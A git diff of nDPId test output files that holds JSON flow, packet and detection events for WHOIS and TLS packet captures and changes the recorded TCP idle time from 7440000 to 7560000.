+00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":310,"flow_first_seen":1519924240121,"flow_last_seen":1519924247388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":226819,"flow_avg_l4_payload_len":731,"midstream":0,"thread_ts_msec":1519924247388,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","packets-captured":620,"packets-processed":620,"total-skipped-flows":0,"total-l4-data-len":410343,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":1519924247388} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 620/620 
diff --git a/test/results/whois.pcapng.out b/test/results/whois.pcapng.out
index ffed45042..522c5c42e 100644
--- a/test/results/whois.pcapng.out
+++ b/test/results/whois.pcapng.out
@@ -1,26 +1,26 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"whois.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"whois.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1507397119066} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1507397119066,"flow_last_seen":1507397119066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1507397119066,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1507397119066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1507397119066,"pkt":"UlQAEjUCCAAnPqwxCABFAAA8folAAEAGwOgKAAIPwAAvO6ycACuFe1kCAAAAAKACchD7eAAAAgQFtAQCCAqvatNhAAAAAAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1507397119183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1507397119183,"pkt":"CAAnPqwxUlQAEjUCCABFAAAsSF0AAEAGNyXAAC87CgACDwArrJwAl14BhXtZA2AS\/\/+y7QAAAgQFtAAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1507397119183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1507397119183,"pkt":"UlQAEjUCCAAnPqwxCABFAAAofopAAEAGwPsKAAIPwAAvO6ycACuFe1kDAJdeAlAQchD7ZAAA"} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1507397119066,"flow_last_seen":1507397119183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1507397119183,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1507397119066,"flow_last_seen":1507397119066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1507397119066,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1507397119066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1507397119066,"pkt":"UlQAEjUCCAAnPqwxCABFAAA8folAAEAGwOgKAAIPwAAvO6ycACuFe1kCAAAAAKACchD7eAAAAgQFtAQCCAqvatNhAAAAAAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1507397119183,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1507397119183,"pkt":"CAAnPqwxUlQAEjUCCABFAAAsSF0AAEAGNyXAAC87CgACDwArrJwAl14BhXtZA2AS\/\/+y7QAAAgQFtAAA"} 
+00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1507397119183,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1507397119183,"pkt":"UlQAEjUCCAAnPqwxCABFAAAofopAAEAGwPsKAAIPwAAvO6ycACuFe1kDAJdeAlAQchD7ZAAA"} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1507397119066,"flow_last_seen":1507397119183,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1507397119183,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","packets-captured":12,"packets-processed":11,"total-skipped-flows":0,"total-l4-data-len":246,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1604305198454} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604305198454,"flow_last_seen":1604305198454,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604305198454,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1604305198454,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":86,"pkt_l4_len":48,"thread_ts_msec":1604305198454,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAAROArQAB5BrfTChEiiwoRMwj6EBD3\/zhGhgAAAADAAvrwy1EAAAIEBWoBAwMIAQEEAkwKAQEKEf5EAAVMBAwhAQA="} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1604305198454,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":86,"pkt_l4_len":48,"thread_ts_msec":1604305198454,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAAROArQAB4BrjTChEiiwoRMwj6EBD3\/zhGhgAAAADAAvrwy1EAAAIEBWoBAwMIAQEEAkwKAQEKEf5EAAVMBAwhAQA="} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1604305198460,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1604305198460,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAANARIQAB9Bo\/HChEzCAoRIosQ9\/oQPm9gn\/84RoeAEiAA9XQAAAIEBbQBAwMIAQEEAg=="} -01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1604305198454,"flow_last_seen":1604305198677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1604305198677,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-01276{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":1604305198690,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"649d6810e8392f63dc311eecb6b7098b","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384","issuerDN":"CN=10.17.51.7","subjectDN":"CN=10.17.51.7, CN=10.17.51.7","alpn":"h2,http\/1.1","fingerprint":"DD:4E:28:9B:08:C1:D5:63:D1:B6:FC:DD:FD:91:A9:D4:E3:A8:7F:D5"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1507397119066,"flow_last_seen":1507397119369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1604305198690,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604305198454,"flow_last_seen":1604305198454,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604305198454,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1604305198454,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":86,"pkt_l4_len":48,"thread_ts_msec":1604305198454,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAAROArQAB5BrfTChEiiwoRMwj6EBD3\/zhGhgAAAADAAvrwy1EAAAIEBWoBAwMIAQEEAkwKAQEKEf5EAAVMBAwhAQA="} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1604305198454,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":86,"pkt_l4_len":48,"thread_ts_msec":1604305198454,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAAROArQAB4BrjTChEiiwoRMwj6EBD3\/zhGhgAAAADAAvrwy1EAAAIEBWoBAwMIAQEEAkwKAQEKEf5EAAVMBAwhAQA="} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1604305198460,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1604305198460,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAANARIQAB9Bo\/HChEzCAoRIosQ9\/oQPm9gn\/84RoeAEiAA9XQAAAIEBbQBAwMIAQEEAg=="} +01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1604305198454,"flow_last_seen":1604305198677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1604305198677,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01276{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":1604305198690,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"649d6810e8392f63dc311eecb6b7098b","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384","issuerDN":"CN=10.17.51.7","subjectDN":"CN=10.17.51.7, CN=10.17.51.7","alpn":"h2,http\/1.1","fingerprint":"DD:4E:28:9B:08:C1:D5:63:D1:B6:FC:DD:FD:91:A9:D4:E3:A8:7F:D5"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1507397119066,"flow_last_seen":1507397119369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1604305198690,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} 
00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","packets-captured":19,"packets-processed":18,"total-skipped-flows":0,"total-l4-data-len":1806,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1623517268690} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623517268690,"flow_last_seen":1623517268690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623517268690,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623517268690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":62,"pkt_l4_len":24,"thread_ts_msec":1623517268690,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAALKUxAAAtBrE+wB4tHgqgP4AAK8\/hR0rdvNStq\/tgEgW05awAAAIEBVA="} 
-02064{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623517269021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1258,"pkt_l4_len":1220,"thread_ts_msec":1623517269021,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAE2B35AAAtBjPLwB4tHgqgP4AAK8\/hR0rdvdStrBVQGAW0T9cAACAgIERvbWFpbiBOYW1lOiBDWUJFUlBBVFJPTEJELkNPTQ0KICAgUmVnaXN0cnkgRG9tYWluIElEOiAyMTUzNDAwMTAwX0RPTUFJTl9DT00tVlJTTg0KICAgUmVnaXN0cmFyIFdIT0lTIFNlcnZlcjogd2hvaXMuUHVibGljRG9tYWluUmVnaXN0cnkuY29tDQogICBSZWdpc3RyYXIgVVJMOiBodHRwOi8vd3d3LnB1YmxpY2RvbWFpbnJlZ2lzdHJ5LmNvbQ0KICAgVXBkYXRlZCBEYXRlOiAyMDIwLTA4LTI5VDA3OjQxOjUyWg0KICAgQ3JlYXRpb24gRGF0ZTogMjAxNy0wOC0xNFQxNjoxMDo1MVoNCiAgIFJlZ2lzdHJ5IEV4cGlyeSBEYXRlOiAyMDIxLTA4LTE0VDE2OjEwOjUxWg0KICAgUmVnaXN0cmFyOiBQRFIgTHRkLiBkL2IvYSBQdWJsaWNEb21haW5SZWdpc3RyeS5jb20NCiAgIFJlZ2lzdHJhciBJQU5BIElEOiAzMDMNCiAgIFJlZ2lzdHJhciBBYnVzZSBDb250YWN0IEVtYWlsOiBhYnVzZS1jb250YWN0QHB1YmxpY2RvbWFpbnJlZ2lzdHJ5LmNvbQ0KICAgUmVnaXN0cmFyIEFidXNlIENvbnRhY3QgUGhvbmU6ICsxLjIwMTM3NzU5NTINCiAgIERvbWFpbiBTdGF0dXM6IGNsaWVudFRyYW5zZmVyUHJvaGliaXRlZCBodHRwczovL2ljYW5uLm9yZy9lcHAjY2xpZW50VHJhbnNmZXJQcm9oaWJpdGVkDQogICBOYW1lIFNlcnZlcjogTlMyNS5FSUNSQS5ORVQNCiAgIE5hbWUgU2VydmVyOiBOUzI2LkVJQ1JBLk5FVA0KICAgRE5TU0VDOiB1bnNpZ25lZA0KICAgVVJMIG9mIHRoZSBJQ0FOTiBXaG9pcyBJbmFjY3VyYWN5IENvbXBsYWludCBGb3JtOiBodHRwczovL3d3dy5pY2Fubi5vcmcvd2ljZi8NCj4+PiBMYXN0IHVwZGF0ZSBvZiB3aG9pcyBkYXRhYmFzZTogMjAyMS0wNi0xMlQxNjowMDo1NlogPDw8DQoNCkZvciBtb3JlIGluZm9ybWF0aW9uIG9uIFdob2lzIHN0YXR1cyBjb2RlcywgcGxlYXNlIHZpc2l0IGh0dHBzOi8vaWNhbm4ub3JnL2VwcA0KDQpOT1RJQ0U6IFRoZSBleHBpcmF0aW9uIGRhdGUgZGlzcGxheWVkIGluIHRoaXMgcmVjb3JkIGlzIHRoZSBkYXRlIHRoZQ0KcmVnaXN0cmFyJ3Mgc3BvbnNvcnNoaXAgb2YgdGhlIGRvbWFpbiBuYW1lIHJlZ2lzdHJhdGlvbiBpbiB0aGUgcmVnaXN0cnkgaXMNCmN1cnJlbnRseSBzZXQgdG8gZXhwaXJlLiBUaGlzIGRhdGUgZG9lcyBub3QgbmVjZXNzYXJpbHkgcmVmbGVjdCB0aGUgZXhwa
XJhdGlvbg0KZGF0ZSBvZiB0aGUgZG9tYWluIG5hbWUgcmVnaXN0cmFudCdzIGFncg=="} -02064{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623517269021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1258,"pkt_l4_len":1220,"thread_ts_msec":1623517269021,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAE2Mf8AAAtBonHwB4tHgqgP4AAK8\/hR0ribdStrBVQGAW06F4AAGVlbWVudCB3aXRoIHRoZSBzcG9uc29yaW5nDQpyZWdpc3RyYXIuICBVc2VycyBtYXkgY29uc3VsdCB0aGUgc3BvbnNvcmluZyByZWdpc3RyYXIncyBXaG9pcyBkYXRhYmFzZSB0bw0KdmlldyB0aGUgcmVnaXN0cmFyJ3MgcmVwb3J0ZWQgZGF0ZSBvZiBleHBpcmF0aW9uIGZvciB0aGlzIHJlZ2lzdHJhdGlvbi4NCg0KVEVSTVMgT0YgVVNFOiBZb3UgYXJlIG5vdCBhdXRob3JpemVkIHRvIGFjY2VzcyBvciBxdWVyeSBvdXIgV2hvaXMNCmRhdGFiYXNlIHRocm91Z2ggdGhlIHVzZSBvZiBlbGVjdHJvbmljIHByb2Nlc3NlcyB0aGF0IGFyZSBoaWdoLXZvbHVtZSBhbmQNCmF1dG9tYXRlZCBleGNlcHQgYXMgcmVhc29uYWJseSBuZWNlc3NhcnkgdG8gcmVnaXN0ZXIgZG9tYWluIG5hbWVzIG9yDQptb2RpZnkgZXhpc3RpbmcgcmVnaXN0cmF0aW9uczsgdGhlIERhdGEgaW4gVmVyaVNpZ24gR2xvYmFsIFJlZ2lzdHJ5DQpTZXJ2aWNlcycgKCJWZXJpU2lnbiIpIFdob2lzIGRhdGFiYXNlIGlzIHByb3ZpZGVkIGJ5IFZlcmlTaWduIGZvcg0KaW5mb3JtYXRpb24gcHVycG9zZXMgb25seSwgYW5kIHRvIGFzc2lzdCBwZXJzb25zIGluIG9idGFpbmluZyBpbmZvcm1hdGlvbg0KYWJvdXQgb3IgcmVsYXRlZCB0byBhIGRvbWFpbiBuYW1lIHJlZ2lzdHJhdGlvbiByZWNvcmQuIFZlcmlTaWduIGRvZXMgbm90DQpndWFyYW50ZWUgaXRzIGFjY3VyYWN5LiBCeSBzdWJtaXR0aW5nIGEgV2hvaXMgcXVlcnksIHlvdSBhZ3JlZSB0byBhYmlkZQ0KYnkgdGhlIGZvbGxvd2luZyB0ZXJtcyBvZiB1c2U6IFlvdSBhZ3JlZSB0aGF0IHlvdSBtYXkgdXNlIHRoaXMgRGF0YSBvbmx5DQpmb3IgbGF3ZnVsIHB1cnBvc2VzIGFuZCB0aGF0IHVuZGVyIG5vIGNpcmN1bXN0YW5jZXMgd2lsbCB5b3UgdXNlIHRoaXMgRGF0YQ0KdG86ICgxKSBhbGxvdywgZW5hYmxlLCBvciBvdGhlcndpc2Ugc3VwcG9ydCB0aGUgdHJhbnNtaXNzaW9uIG9mIG1hc3MNCnVuc29saWNpdGVkLCBjb21tZXJjaWFsIGFkdmVydGlzaW5nIG9yIHNvbGljaXRhdGlvbnMgdmlhIGUtbWFpbCwgdGVsZXBob25lLA0Kb3IgZmFjc2ltaWxlOyBvciAoMikgZW5hYmxlIGhpZ2ggdm9sdW1lLCBhdXRvbWF0ZWQsIGV
